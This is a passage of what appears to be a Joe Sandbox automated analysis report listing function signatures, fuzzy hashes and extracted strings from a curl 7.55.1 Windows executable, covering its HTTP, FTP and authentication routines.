                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$mallocstrchr
                                      • String ID: %.*s$%sAuthorization: Digest %s$CONNECT$Digest$Proxy-$WDigest
                                      • API String ID: 3005890304-799980647
                                      • Opcode ID: b4d05840df89775c666fa5cfed2c2c4428efe5547476a30764a13d5dcc0c65aa
                                      • Instruction ID: 0ddedb245f28e25a659a80f712ec8d31d7df033ded58ef850ec37fcf8e0f9c62
                                      • Opcode Fuzzy Hash: b4d05840df89775c666fa5cfed2c2c4428efe5547476a30764a13d5dcc0c65aa
                                      • Instruction Fuzzy Hash: D4518E22609B8691EB10AB16F8403BAE790FF49B94F884031DE5D473E4DF3CD449E798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$Server %s is blacklisted
                                      • API String ID: 1294909896-1139449155
                                      • Opcode ID: d39bedb26836cdfebdd456c73846e8f7855019e14df3486f376ad4e848e6d463
                                      • Instruction ID: 115f2819ae44d2f9a0ef25d1d67823a2d754fba16fb8abf1f790efa0ddc53f35
                                      • Opcode Fuzzy Hash: d39bedb26836cdfebdd456c73846e8f7855019e14df3486f376ad4e848e6d463
                                      • Instruction Fuzzy Hash: C3C18032A0878A86EB64EB24D5406B9F7A0FF09750F944131CB6D836D1DF3CE459E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isdigitstrtoll
                                      • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                      • API String ID: 4221162866-2096918210
                                      • Opcode ID: b900c6d4ef276404dccdd6a4971ba09839827865aad87a0e3b91fac2d47e7831
                                      • Instruction ID: 847480ad432116ac204599c76ad483220d993580abcb1138ccbe6181c15b55f5
                                      • Opcode Fuzzy Hash: b900c6d4ef276404dccdd6a4971ba09839827865aad87a0e3b91fac2d47e7831
                                      • Instruction Fuzzy Hash: 9E51E6A1A0C78281FB64AB25F540178E650AF4CBD4FD40276DA3D07AC5DF2CE549B3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_l
                                      • String ID: APPE %s$Could not seek stream$Failed to read data$File already completely uploaded$SIZE %s$STOR %s
                                      • API String ID: 2941638530-2460033967
                                      • Opcode ID: 35d2f6084ad7585b2122fba229bcadaebe88b0c94ac0bf62a99e98bbbcc77b4f
                                      • Instruction ID: ccff0a1f2d6765f5d03c0fb62a074a2756f323e65ead086634f391880b8e6eef
                                      • Opcode Fuzzy Hash: 35d2f6084ad7585b2122fba229bcadaebe88b0c94ac0bf62a99e98bbbcc77b4f
                                      • Instruction Fuzzy Hash: 7A518862B097C686EB54AB25D9403A9E7A1FF48784F840131CE2D477D0DF7DE158A398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_cwprintf_s_lstrchr
                                      • String ID: %s%s%s$LIST$NLST
                                      • API String ID: 2810347522-959297966
                                      • Opcode ID: 926aaa9f5a9102dc8a02f26edabe0c2261238b94456cd8514f6f05b13b36622e
                                      • Instruction ID: 4b2bef53491215343f551cd3373b37ebcdd589bf4dadbab4a62c2815d191cea6
                                      • Opcode Fuzzy Hash: 926aaa9f5a9102dc8a02f26edabe0c2261238b94456cd8514f6f05b13b36622e
                                      • Instruction Fuzzy Hash: F7415121A0978685EB64AB11E95027DE7A0EF4DB90F880175CE2E077D1DF2CE409E3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D02C04: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02C5C
                                      • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0B660
                                        • Part of subcall function 00007FF7F8D077B0: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _strdupfputsmalloc
                                      • String ID: curl/7.55.1$curl_easy_cleanup(hnd);$hnd = NULL;$hnd = curl_easy_init();$host$out of memory$proxy
                                      • API String ID: 2522119665-861652760
                                      • Opcode ID: 592eae184c67aac37ca0021fe992a8c0f832ade09a7e0f21f7ec28b7cf7977fa
                                      • Instruction ID: ebeadaf438ea1795782cd3153c9860d909f91d2c632e1161c3bf6f5fa498737c
                                      • Opcode Fuzzy Hash: 592eae184c67aac37ca0021fe992a8c0f832ade09a7e0f21f7ec28b7cf7977fa
                                      • Instruction Fuzzy Hash: C8310161A0DA4791EB65BB65D4503B9E350EF48780FC40032DA7E8B2D5EF7CE449E3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D06C80: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06CA6
                                        • Part of subcall function 00007FF7F8D06C80: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06CC5
                                      • puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06D4E
                                      • puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06DA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: puts$__acrt_iob_func__stdio_common_vfprintf
                                      • String ID: %s $Features: $Protocols: $Release-Date: %s$[unreleased]$curl 7.55.1 (Windows) %s
                                      • API String ID: 1995075677-1211838556
                                      • Opcode ID: 1accf5a72dd6a4eed95d6f573e2881219f83543aa2d5184bc90e0274b82108cf
                                      • Instruction ID: ed6da72c95fc6d23a55f4f5b07970dfb43d2af6e937177c934d61d4e181cc063
                                      • Opcode Fuzzy Hash: 1accf5a72dd6a4eed95d6f573e2881219f83543aa2d5184bc90e0274b82108cf
                                      • Instruction Fuzzy Hash: 8021C921A18A0691EB14BB21F8442B8E760EF5C754FC84136D53D062E9EF2CE54CE3E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: %s/%s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)
                                      • API String ID: 1294909896-3696550590
                                      • Opcode ID: 94d7fe1659370ef29a4583caa8c44e372ae377573aa2d7c76aac579256db8951
                                      • Instruction ID: c66e32f66abb6c3fa40212382c4ec7807e355b725a428d66b1ff230122bf18c7
                                      • Opcode Fuzzy Hash: 94d7fe1659370ef29a4583caa8c44e372ae377573aa2d7c76aac579256db8951
                                      • Instruction Fuzzy Hash: 83B14F32609B4686EB109F26F4501A9F3A8FF48784F884076DEAE43B94DF3CE409D794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: PARTIAL$SECTION$UID$UIDVALIDITY
                                      • API String ID: 1294909896-4241916623
                                      • Opcode ID: 5575cbe3dcb876df732ec74319d28c455a42f79baf2a3df8ce200ac81d9127a9
                                      • Instruction ID: b59bd73e1f68d4dbeb01590a9e4d498151c13766e4b5351c361b083281d1bb1e
                                      • Opcode Fuzzy Hash: 5575cbe3dcb876df732ec74319d28c455a42f79baf2a3df8ce200ac81d9127a9
                                      • Instruction Fuzzy Hash: 9FA1F76290CA8285FB21EB61D80057CE7A4FF4DBD4F984132DE6D836D1CE2CD549B7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: %sAuthorization: NTLM %s$CONNECT$NTLM$Proxy-
                                      • API String ID: 1294909896-1963909029
                                      • Opcode ID: 3736cea0bb1a2c34ddb2429edd407646aa63b5375f1bf1fca037c041a0adc4a8
                                      • Instruction ID: 4c609e58f12bf46a0831d1d9f0b5e152b52530b8c89859eeb065f16dafb58744
                                      • Opcode Fuzzy Hash: 3736cea0bb1a2c34ddb2429edd407646aa63b5375f1bf1fca037c041a0adc4a8
                                      • Instruction Fuzzy Hash: 75514D35A09A4285EB61AB52F8447A9E364FF4DB88F884031DE6D8B3D0EE3CD049E754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strchrstrtol
                                      • String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
                                      • API String ID: 137861075-1840313707
                                      • Opcode ID: 96bb8bf37a7f1b29450a3bd90f1fbcd15455606420cfcb411577c3662ce3d14e
                                      • Instruction ID: bd3ee5a9b3ade60950aff312a246042b6319340b8c5db3ef182f761d72adf878
                                      • Opcode Fuzzy Hash: 96bb8bf37a7f1b29450a3bd90f1fbcd15455606420cfcb411577c3662ce3d14e
                                      • Instruction Fuzzy Hash: CE51D46260CEC280FB71AF35A8403B9E790AF49BA4F884235DD6D476C5CE3CD549A7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: inet_pton$ErrorLast__swprintf_l_errno
                                      • String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
                                      • API String ID: 4235329958-1389973398
                                      • Opcode ID: 07359c1ea5bac126babf869e1e33155a058d4e5252691af74224b37241d4aefd
                                      • Instruction ID: 32f614b91b659e504cb569c81459de5e7458aeac6a552cf008b5f730e82c104f
                                      • Opcode Fuzzy Hash: 07359c1ea5bac126babf869e1e33155a058d4e5252691af74224b37241d4aefd
                                      • Instruction Fuzzy Hash: F741B262B08A0296F710FB629440AFDE3A1BF49B98F854035DE2D577C5DE38D50EE3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLasthtonssend
                                      • String ID: Sending data failed (%d)
                                      • API String ID: 2027122571-2319402659
                                      • Opcode ID: 9912b01933f5dcd75e21ab68b37d4110e85310cbefb5777e8cbbc792cda17809
                                      • Instruction ID: 1fcbbe456a5c92fa33fe6a05d06f2c3fa8eb866062d8c882d9dbcd247329192b
                                      • Opcode Fuzzy Hash: 9912b01933f5dcd75e21ab68b37d4110e85310cbefb5777e8cbbc792cda17809
                                      • Instruction Fuzzy Hash: B541B132708A8691EB04AF35D4546A8F720FB59F88F848632DB6D07798DF7CD04AE359
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _time64
                                      • String ID: 2$Connection time-out$gfff$gfff$set timeouts for state %d; Total %ld, retry %d maxtry %d
                                      • API String ID: 1670930206-13630374
                                      • Opcode ID: 9c389e7095b100bfe67e1fe2159cbe924afc5a989db150ba623b16a898bcfdcf
                                      • Instruction ID: 5b0dee0f4ef1474d58848daaa3c7819d996a7d35caf3d8bd6f309e939f839367
                                      • Opcode Fuzzy Hash: 9c389e7095b100bfe67e1fe2159cbe924afc5a989db150ba623b16a898bcfdcf
                                      • Instruction Fuzzy Hash: 2041C4B6B0860686DB24DF2AE04056CB7A4FB9CF48F544136EA1DC7788DE38E545D784
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_cwprintf_s_l
                                      • String ID: "$Failure sending QUIT command: %s$QUIT
                                      • API String ID: 2020354070-4038173491
                                      • Opcode ID: 7490a0e6b991acf88320d5db9cf54888be0e142dd9567c0bdf4decb33f71f7f9
                                      • Instruction ID: c71b3041281c26164711f719bc4d2fc26740f17470b581dae8a3c470854ca627
                                      • Opcode Fuzzy Hash: 7490a0e6b991acf88320d5db9cf54888be0e142dd9567c0bdf4decb33f71f7f9
                                      • Instruction Fuzzy Hash: 08313C21B0DA8691FB14AB25E5543BDE791FF4DB48F880035CA2D4B2D1CF6DE059A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_l
                                      • String ID: ACCT %s$ACCT requested but none available$Access denied: %03d$PASS %s
                                      • API String ID: 2941638530-2304280848
                                      • Opcode ID: f96b070ad755c29d2e43b67ae99b433f69721f0275251ecc226ff64650d08fa5
                                      • Instruction ID: 7cdf6b14f53b9f6355a5dd597bb7bfe766815518658bda2b23213580c28a8a79
                                      • Opcode Fuzzy Hash: f96b070ad755c29d2e43b67ae99b433f69721f0275251ecc226ff64650d08fa5
                                      • Instruction Fuzzy Hash: 742164A1D0C78290FF90AB19E4447B8E290AF4D754FC84036DD2D4A2D1EF6DA58DB3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • Failed to set filetime %ld on outfile: SetFileTime failed: GetLastError %u, xrefs: 00007FF7F8D078A3
                                      • Failed to set filetime %ld on outfile: CreateFile failed: GetLastError %u, xrefs: 00007FF7F8D078C9
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorFileLast$CloseCreateHandleTime
                                      • String ID: Failed to set filetime %ld on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %ld on outfile: SetFileTime failed: GetLastError %u
                                      • API String ID: 1269242970-3682749385
                                      • Opcode ID: 4071e6dd32300ba6e4a3f3850a189359ca93319df8c800741c8821b52f9c8241
                                      • Instruction ID: e277695a46df5ad1f505ca4665700f0fa7f2cae9f2400dbdff3a978849ad91ce
                                      • Opcode Fuzzy Hash: 4071e6dd32300ba6e4a3f3850a189359ca93319df8c800741c8821b52f9c8241
                                      • Instruction Fuzzy Hash: B0118E31B0C64182E714AB52B4543AAF660EF88BE4F844635D96E0ABD8DF7CE009DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: %s/%s$GSSAPI$GSSAPI handshake failure (empty challenge message)$Kerberos
                                      • API String ID: 2803490479-3513357789
                                      • Opcode ID: 2bce60dd646ec84f7810cbd7a83d7125c7a8c57d4552ea3013e5742b1315ca6a
                                      • Instruction ID: 47c7d777bf32805626920ffcd742b2831fb0bcb70fd593887d0d5a147b603681
                                      • Opcode Fuzzy Hash: 2bce60dd646ec84f7810cbd7a83d7125c7a8c57d4552ea3013e5742b1315ca6a
                                      • Instruction Fuzzy Hash: 4AC14932A09B4685EB10EF66F8502A9B7A4FF4CB84F880076DE5E47794EF38D448D754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$calloc
                                      • String ID: Wildcard - Parsing started
                                      • API String ID: 3095843317-2274641867
                                      • Opcode ID: c9a8a571f490a9d25679ea69989963843689939123e3b118d4891a39b1b71923
                                      • Instruction ID: 39ba62958c44a34312ff5dac8497fdf00ff50598a1bb5d211b837bff47e51b01
                                      • Opcode Fuzzy Hash: c9a8a571f490a9d25679ea69989963843689939123e3b118d4891a39b1b71923
                                      • Instruction Fuzzy Hash: E871B965609A86C2EB14EB21F854379E3A4FF4CB80F894475CB6E47790DF3CE448A398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
